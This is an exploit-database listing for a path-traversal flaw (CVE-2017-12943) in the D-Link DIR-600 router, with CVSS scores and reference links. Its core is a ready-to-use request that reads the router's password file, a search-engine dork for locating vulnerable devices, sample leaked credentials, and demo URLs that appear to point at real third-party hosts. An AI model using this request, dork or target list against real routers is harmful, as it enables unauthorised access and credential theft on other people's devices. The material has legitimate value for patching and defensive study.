D-Link DIR-600 - Authentication Bypass

2017.09.25
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

--Title: D-Link DIR-600 - Path Traversal Attack --Win10 --Credit: Informacion - Anonymous - Jithin D Kurup --Vendor: http://www.dlinkla.com --Homepage: http://www.dlinkla.com --Dork: intext:Copyright 2004-2007 D-Link Systems, Inc. intitle:D-LINK SYSTEMS, INC. | WIRELESS ROUTER : Login --Exploit: /model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd --CVE: 2017-12943 --Category: Webapps --Tutorial: http://vulnsitedlink/login.htm/model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd #B00m! #admin:admin123 --Demos: #http://dev.grible.org #http://90-156-41-154.internetia.net.pl/bsc_internet.php =========================================================================

References:

https://www.youtube.com/watch?v=PeNOJORAQsQ
https://www.exploit-db.com/exploits/42581/
https://www.facebook.com/Informacion-Anonymous-611394289006994/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top